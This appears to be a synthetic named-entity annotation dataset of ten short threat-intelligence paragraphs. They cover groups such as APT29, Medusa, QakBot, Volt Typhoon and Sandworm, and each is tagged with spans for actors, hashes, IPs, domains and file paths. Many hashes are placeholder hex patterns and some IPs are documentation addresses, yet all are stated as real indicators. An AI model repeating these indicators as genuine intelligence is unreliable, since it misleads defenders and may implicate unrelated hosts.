{"text": "APT29, also known as Cozy Bear and tracked by Microsoft as Midnight Blizzard, conducted a phishing campaign targeting European diplomatic entities in Q1 2025. The group distributed malicious ISO files containing a shortcut file that executed a DLL payload via rundll32.exe. The DLL with SHA256 hash f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2 was loaded from C:\\Users\\Public\\Documents\\config.dll. C2 communications were directed to auth-microsoft365.com and login-sharepoint.org over HTTPS port 443. The phishing emails were sent from compromised accounts at legitimate organizations and contained links to hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload. Secondary C2 infrastructure was hosted at 194.58.112.43 and 89.34.27.199. The group also deployed Brute Ratel C4 from C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe.", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "THREAT_ACTOR: Cozy Bear": [[21, 30]], "THREAT_ACTOR: Midnight Blizzard": [[59, 76]], "ORGANIZATION: Microsoft": [[46, 55]], "TOOL: rundll32.exe": [[260, 272]], "HASH: f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[299, 363]], "FILEPATH: C:\\Users\\Public\\Documents\\config.dll": [[380, 416]], "DOMAIN: auth-microsoft365.com": [[453, 474]], "DOMAIN: login-sharepoint.org": [[479, 499]], "URL: hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload": [[628, 694]], "IP_ADDRESS: 194.58.112.43": [[738, 751]], "IP_ADDRESS: 89.34.27.199": [[756, 768]], "MALWARE: Brute Ratel C4": [[794, 808]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe": [[814, 859]]}, "info": {"id": "malware_00016", "source": "malware_reports"}}
{"text": "The Medusa ransomware group emerged in 2023 and operates a ransomware-as-a-service model. CISA released advisory AA25-071A documenting Medusa's tactics. The ransomware binary typically has filename gaze.exe or medusa_locker.exe and is deployed after initial access via exposed RDP services or phishing. Medusa uses the legitimate tool PsExec for lateral movement and deploys Advanced IP Scanner for network reconnaissance. The ransomware appends the .MEDUSA extension to encrypted files and drops a ransom note named !!!READ_ME_MEDUSA!!!.txt. Known C2 infrastructure includes the domains medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion and medusa-blog.xyz. Observed IP addresses used for data exfiltration: 45.8.146.23, 193.233.133.58, and 91.92.242.87. File hashes associated with Medusa include SHA256 c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2 and MD5 b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7.", "spans": {"MALWARE: Medusa": [[4, 10], [135, 141], [303, 309], [796, 802]], "ORGANIZATION: CISA": [[90, 94]], "FILEPATH: gaze.exe": [[198, 206]], "FILEPATH: medusa_locker.exe": [[210, 227]], "TOOL: PsExec": [[335, 341]], "TOOL: Advanced IP Scanner": [[375, 394]], "FILEPATH: !!!READ_ME_MEDUSA!!!.txt": [[517, 541]], "DOMAIN: medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion": [[588, 649]], "DOMAIN: medusa-blog.xyz": [[654, 669]], "IP_ADDRESS: 45.8.146.23": [[721, 732]], "IP_ADDRESS: 193.233.133.58": [[734, 748]], "IP_ADDRESS: 91.92.242.87": [[754, 766]], "HASH: c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2": [[818, 882]], "HASH: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7": [[891, 923]]}, "info": {"id": "malware_00017", "source": "malware_reports"}}
{"text": "Despite the FBI takedown in August 2023, QakBot (also known as Qbot and Pinkslipbot) resurfaced in late 2024 with updated infrastructure. The new variant with SHA256 hash 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b communicates with C2 servers at 203.0.113.42, 198.51.100.73, and 192.0.2.156. The malware is delivered through malicious OneNote files that execute PowerShell commands to download the payload from hxxp://203.0.113.42/updates/kb5034441.dll. QakBot creates persistence via a scheduled task and drops its main DLL to C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll. The malware performs process injection into wermgr.exe and explorer.exe for evasion. Additional C2 domains include update-service-ms.com and cdn-office365.net. Associated email addresses used in phishing: invoice@update-service-ms.com and admin@cdn-office365.net.", "spans": {"MALWARE: QakBot": [[41, 47], [476, 482]], "MALWARE: Qbot": [[63, 67]], "MALWARE: Pinkslipbot": [[72, 83]], "ORGANIZATION: FBI": [[12, 15]], "HASH: 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b": [[171, 235]], "IP_ADDRESS: 203.0.113.42": [[268, 280]], "IP_ADDRESS: 198.51.100.73": [[282, 295]], "IP_ADDRESS: 192.0.2.156": [[301, 312]], "SYSTEM: OneNote": [[357, 364]], "TOOL: PowerShell": [[384, 394]], "URL: hxxp://203.0.113.42/updates/kb5034441.dll": [[433, 474]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll": [[550, 600]], "SYSTEM: wermgr.exe": [[646, 656]], "SYSTEM: explorer.exe": [[661, 673]], "DOMAIN: update-service-ms.com": [[717, 738]], "DOMAIN: cdn-office365.net": [[743, 760]], "EMAIL: invoice@update-service-ms.com": [[807, 836]], "EMAIL: admin@cdn-office365.net": [[841, 864]]}, "info": {"id": "malware_00018", "source": "malware_reports"}}
{"text": "The BlackCat ransomware, also tracked as ALPHV, deployed a new variant in 2024 targeting VMware ESXi hypervisors. The Linux variant with SHA1 hash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b was designed to encrypt virtual machine disk files on ESXi hosts. The attack began with exploitation of CVE-2024-37085 in VMware ESXi to gain administrative access. The threat actor used SSH to connect to ESXi hosts from 172.16.45.3 and uploaded the ransomware to /tmp/esxi_encrypt. The ransomware configuration was stored at /tmp/.config.json. Exfiltration of sensitive data occurred via rclone to Mega cloud storage, with traffic routed through 185.174.137.92. Additional SHA256 hashes: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 and a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1. C2 communications used the domain alphv-paymentsite.onion.", "spans": {"MALWARE: BlackCat": [[4, 12]], "MALWARE: ALPHV": [[41, 46]], "SYSTEM: VMware ESXi": [[89, 100], [310, 321]], "HASH: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b": [[147, 187]], "CVE_ID: CVE-2024-37085": [[292, 306]], "IP_ADDRESS: 172.16.45.3": [[409, 420]], "FILEPATH: /tmp/esxi_encrypt": [[452, 469]], "FILEPATH: /tmp/.config.json": [[514, 531]], "TOOL: rclone": [[577, 583]], "IP_ADDRESS: 185.174.137.92": [[635, 649]], "HASH: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5": [[677, 741]], "HASH: a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1": [[746, 810]], "DOMAIN: alphv-paymentsite.onion": [[846, 869]]}, "info": {"id": "malware_00019", "source": "malware_reports"}}
{"text": "Lazarus Group, also known as Hidden Cobra and attributed to North Korea's RGB, conducted the TraderTraitor campaign targeting cryptocurrency firms. The FBI and CISA published a joint advisory documenting the attacks. The group distributed trojanized cryptocurrency trading applications with SHA256 hashes e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 and b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0. The applications connected to C2 infrastructure at api-trader.chainfund.io and exchange-data.cryptonode.org on port 8443. Malicious payloads were hosted at hxxps://api-trader.chainfund.io/v2/update/electron.asar. The backdoor was installed to /Library/Application Support/.daemon/updater and ~/Library/LaunchAgents/com.apple.update.plist on macOS targets. C2 IP addresses included 104.168.174.22 and 107.189.10.143. The group also used social engineering via LinkedIn, sending messages from accounts like recruit@hrnodes.io.", "spans": {"THREAT_ACTOR: Lazarus Group": [[0, 13]], "THREAT_ACTOR: Hidden Cobra": [[29, 41]], "ORGANIZATION: FBI": [[152, 155]], "ORGANIZATION: CISA": [[160, 164]], "HASH: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6": [[305, 369]], "HASH: b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0": [[374, 438]], "DOMAIN: api-trader.chainfund.io": [[491, 514]], "DOMAIN: exchange-data.cryptonode.org": [[519, 547]], "URL: hxxps://api-trader.chainfund.io/v2/update/electron.asar": [[596, 651]], "FILEPATH: /Library/Application Support/.daemon/updater": [[683, 727]], "FILEPATH: ~/Library/LaunchAgents/com.apple.update.plist": [[732, 777]], "IP_ADDRESS: 104.168.174.22": [[821, 835]], "IP_ADDRESS: 107.189.10.143": [[840, 854]], "EMAIL: recruit@hrnodes.io": [[945, 963]], "SYSTEM: macOS": [[781, 786]], "SYSTEM: LinkedIn": [[899, 907]]}, "info": {"id": "malware_00020", "source": "malware_reports"}}
{"text": "Volt Typhoon, a Chinese state-sponsored threat actor, targeted U.S. critical infrastructure using living-off-the-land techniques. Microsoft and the Five Eyes intelligence alliance published advisories. The group gained initial access through Fortinet FortiGuard devices exploiting CVE-2024-21762. Post-compromise activity relied on netsh, ntdsutil, PowerShell, and wmic for discovery and credential access. The attackers used compromised SOHO routers at IP addresses 24.199.247.13, 67.230.163.214, and 162.245.191.78 as operational relay infrastructure. Web shells were deployed to C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx. Lateral movement used PsExec and Windows Management Instrumentation. Exfiltrated data was staged at C:\\Windows\\Temp\\cab_extract\\ before transfer. No custom malware was deployed; the group relied entirely on built-in Windows tools including cmd.exe, certutil, and bitsadmin.", "spans": {"THREAT_ACTOR: Volt Typhoon": [[0, 12]], "ORGANIZATION: Microsoft": [[130, 139]], "SYSTEM: Fortinet FortiGuard": [[242, 261]], "CVE_ID: CVE-2024-21762": [[281, 295]], "TOOL: netsh": [[332, 337]], "TOOL: ntdsutil": [[339, 347]], "TOOL: PowerShell": [[349, 359]], "TOOL: wmic": [[365, 369]], "IP_ADDRESS: 24.199.247.13": [[467, 480]], "IP_ADDRESS: 67.230.163.214": [[482, 496]], "IP_ADDRESS: 162.245.191.78": [[502, 516]], "FILEPATH: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx": [[582, 636]], "TOOL: PsExec": [[660, 666]], "FILEPATH: C:\\Windows\\Temp\\cab_extract\\": [[738, 766]], "TOOL: cmd.exe": [[878, 885]], "TOOL: certutil": [[887, 895]], "TOOL: bitsadmin": [[901, 910]], "SYSTEM: Windows": [[671, 678], [854, 861]]}, "info": {"id": "malware_00021", "source": "malware_reports"}}
{"text": "Sandworm, attributed to Russia's GRU Unit 74455 and tracked by Microsoft as Seashell Blizzard, deployed destructive malware against Ukrainian energy infrastructure. The group used Industroyer2 to target industrial control systems at substations, alongside CaddyWiper (SHA256 a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7) to destroy data on Windows systems. The attack was coordinated with OrcShred wiper for Linux and Solaris targets with hash c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9. C2 infrastructure was hosted at 91.245.228.56 and 176.57.215.92. Malicious scripts were deployed to /var/tmp/.update.sh and /opt/oracle/extproc.sh. The Industroyer2 configuration targeted IEC-104 protocol on ports 2404 and contained hardcoded IP addresses of substation RTUs at 10.25.100.1 and 10.25.100.2.", "spans": {"THREAT_ACTOR: Sandworm": [[0, 8]], "ORGANIZATION: GRU": [[33, 36]], "THREAT_ACTOR: Seashell Blizzard": [[76, 93]], "ORGANIZATION: Microsoft": [[63, 72]], "MALWARE: Industroyer2": [[180, 192], [682, 694]], "MALWARE: CaddyWiper": [[256, 266]], "HASH: a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7": [[275, 339]], "SYSTEM: Windows": [[360, 367]], "MALWARE: OrcShred": [[409, 417]], "SYSTEM: Linux": [[428, 433]], "SYSTEM: Solaris": [[438, 445]], "HASH: c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9": [[464, 528]], "IP_ADDRESS: 91.245.228.56": [[562, 575]], "IP_ADDRESS: 176.57.215.92": [[580, 593]], "FILEPATH: /var/tmp/.update.sh": [[630, 649]], "FILEPATH: /opt/oracle/extproc.sh": [[654, 676]], "IP_ADDRESS: 10.25.100.1": [[808, 819]], "IP_ADDRESS: 10.25.100.2": [[824, 835]]}, "info": {"id": "malware_00022", "source": "malware_reports"}}
{"text": "FIN7, also known as Carbanak Group and ITG14, targeted the U.S. hospitality and retail sectors with novel malware. The group sent phishing emails with malicious DOCX attachments exploiting CVE-2023-36884 in Microsoft Office. The payload, a JScript backdoor named Lizar, was dropped to C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js and beaconed to the C2 domain cdn-static-updates.com at IP 185.219.52.229. Additional C2 domains: api-gateway-service.com and storage-cloud-backup.net. The group also deployed Carbanak backdoor (SHA256 d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2) and used BloodHound for Active Directory reconnaissance. Cobalt Strike beacons connected to 45.129.14.88 and 91.195.240.117. The Lizar implant communicated over DNS TXT records to evade network detection.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: Carbanak Group": [[20, 34]], "CVE_ID: CVE-2023-36884": [[189, 203]], "SYSTEM: Microsoft Office": [[207, 223]], "MALWARE: Lizar": [[263, 268], [723, 728]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js": [[285, 325]], "DOMAIN: cdn-static-updates.com": [[356, 378]], "IP_ADDRESS: 185.219.52.229": [[385, 399]], "DOMAIN: api-gateway-service.com": [[424, 447]], "DOMAIN: storage-cloud-backup.net": [[452, 476]], "MALWARE: Carbanak": [[502, 510]], "HASH: d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[528, 592]], "TOOL: BloodHound": [[603, 613]], "MALWARE: Cobalt Strike": [[651, 664]], "IP_ADDRESS: 45.129.14.88": [[686, 698]], "IP_ADDRESS: 91.195.240.117": [[703, 717]]}, "info": {"id": "malware_00023", "source": "malware_reports"}}
{"text": "Akira ransomware emerged in March 2023 and has targeted over 250 organizations globally. The ransomware group maintains a Tor-based leak site at akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion. Initial access is commonly gained through Cisco VPN appliances exploiting CVE-2023-20269. The ransomware binary (SHA256 hash f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3) encrypts files with the .akira extension. The group uses AnyDesk and RustDesk for remote access, WinSCP for data exfiltration, and Mimikatz for credential dumping. Ransomware deployment scripts are staged at C:\\Windows\\Temp\\deploy.bat and network shares are encrypted via C:\\Users\\Public\\w.exe. C2 IP addresses: 89.105.198.42, 194.26.135.119, and 45.227.255.13. Exfiltrated data is uploaded to mega.nz and transferred via rclone. The decryptor for paying victims is hosted at hxxps://akiradecrypt.org/recover/index.html.", "spans": {"MALWARE: Akira": [[0, 5]], "DOMAIN: akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion": [[145, 207]], "SYSTEM: Cisco VPN": [[251, 260]], "CVE_ID: CVE-2023-20269": [[283, 297]], "HASH: f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3": [[334, 398]], "TOOL: AnyDesk": [[457, 464]], "TOOL: RustDesk": [[469, 477]], "TOOL: WinSCP": [[497, 503]], "TOOL: Mimikatz": [[531, 539]], "FILEPATH: C:\\Windows\\Temp\\deploy.bat": [[608, 634]], "FILEPATH: C:\\Users\\Public\\w.exe": [[672, 693]], "IP_ADDRESS: 89.105.198.42": [[712, 725]], "IP_ADDRESS: 194.26.135.119": [[727, 741]], "IP_ADDRESS: 45.227.255.13": [[747, 760]], "TOOL: rclone": [[822, 828]], "URL: hxxps://akiradecrypt.org/recover/index.html": [[876, 919]]}, "info": {"id": "malware_00024", "source": "malware_reports"}}
{"text": "Emotet returned in November 2024 after a prolonged dormancy period following the January 2021 takedown coordinated by Europol. The new variant with SHA256 hash b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1 is distributed via malicious Excel files with XLM macros. The malware drops its payload to C:\\Windows\\SysWOW64\\randomname.dll and registers persistence through a Windows service. C2 communications use HTTP POST requests to compromised WordPress sites at 103.75.201.2, 45.76.176.10, 104.131.62.48, 158.69.222.101, and 37.44.244.177. The botnet uses a tiered architecture with Epoch 4 and Epoch 5 infrastructure. Key C2 domains include cdn-update-service.com, api-metrics-data.org, and telemetry-reports.net. The malware was observed dropping secondary payloads including SystemBC proxy bot and Bumblebee loader.", "spans": {"MALWARE: Emotet": [[0, 6]], "ORGANIZATION: Europol": [[118, 125]], "HASH: b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1": [[160, 224]], "FILEPATH: C:\\Windows\\SysWOW64\\randomname.dll": [[316, 350]], "IP_ADDRESS: 103.75.201.2": [[479, 491]], "IP_ADDRESS: 45.76.176.10": [[493, 505]], "IP_ADDRESS: 104.131.62.48": [[507, 520]], "IP_ADDRESS: 158.69.222.101": [[522, 536]], "IP_ADDRESS: 37.44.244.177": [[542, 555]], "DOMAIN: cdn-update-service.com": [[659, 681]], "DOMAIN: api-metrics-data.org": [[683, 703]], "DOMAIN: telemetry-reports.net": [[709, 730]], "MALWARE: SystemBC": [[795, 803]], "MALWARE: Bumblebee": [[818, 827]], "SYSTEM: WordPress": [[460, 469]]}, "info": {"id": "malware_00025", "source": "malware_reports"}}